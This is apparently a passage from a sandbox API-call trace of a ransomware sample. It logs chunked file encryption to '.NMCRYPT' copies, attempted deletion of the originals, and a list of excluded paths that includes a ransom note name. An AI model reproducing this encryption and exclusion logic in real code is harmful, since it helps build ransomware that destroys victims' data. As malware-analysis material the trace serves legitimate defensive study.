0x4 [0156.895] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad138) returned 1 [0156.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.895] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=3529) returned 1 [0156.895] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.896] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.897] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.897] GetLastError () returned 0x0 [0156.897] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.967] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.967] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.968] GetLastError () returned 0x0 [0156.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.968] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.968] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.968] GetLastError () returned 0x0 [0156.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.968] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.968] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.968] GetLastError () returned 0x0 [0156.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.968] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.968] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.968] GetLastError () returned 0x0 [0156.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.968] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.968] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.968] GetLastError () returned 0x0 [0156.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.968] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.968] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.968] GetLastError () returned 0x0 [0156.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.968] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.968] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.968] GetLastError () returned 0x0 [0156.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.969] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.969] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.969] GetLastError () returned 0x0 [0156.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.969] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.969] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.969] GetLastError () returned 0x0 [0156.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.969] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.969] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.969] GetLastError () returned 0x0 [0156.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.969] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.969] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.969] GetLastError () returned 0x0 [0156.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.969] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.969] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.969] GetLastError () returned 0x0 [0156.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.969] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0xc9, lpOverlapped=0x0) returned 1 [0156.969] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xc9, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xd0) returned 1 [0156.969] GetLastError () returned 0x0 [0156.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xd0, lpOverlapped=0x0) returned 1 [0156.969] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.970] WriteFile (in: hFile=0x588, lpBuffer=0x607e18*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0x20 [0156.970] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml", dwFileAttributes=0x20) returned 0 [0156.970] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 1 [0156.970] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0 [0156.970] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" [0156.970] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0156.971] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD863.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd863.tmp")) returned 0xd863 [0156.972] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD863.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd863.tmp"), dwFlags=0x1) returned 0 [0156.972] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD863.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd863.tmp")) returned 1 [0156.972] CryptDestroyKey (hKey=0x9ad138) returned 1 [0156.972] wcslen (_String="OK") returned 0x2 [0156.972] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.972] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.972] CryptDestroyKey (hKey=0x9ad338) returned 1 [0156.973] CryptDestroyHash (hHash=0x9ad878) returned 1 [0156.973] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0156.973] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*NMCRYPT") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*Recovers your files.html") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*.exe") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*.dll") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*.lnk") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*.bat") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*.ini") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*.msi") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*.scf") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*pagefile.sys*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*AppData*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\winrar\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\java\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\windows\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\ESET\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\AVG\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*Atheros*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*Realtek*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*bootmgr*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*boot*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*boot*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*IO.SYS*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*ntldr*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*chrome*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*opera*") returned 0 [0156.973] PathMatchSpecW (pszFile="base_heb.xml", pszSpec="*firefox*") returned 0 [0156.973] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml", pszSpec="*") returned 1 [0156.973] strlen (_Str="NMoreira") returned 0x8 [0156.973] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.973] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] 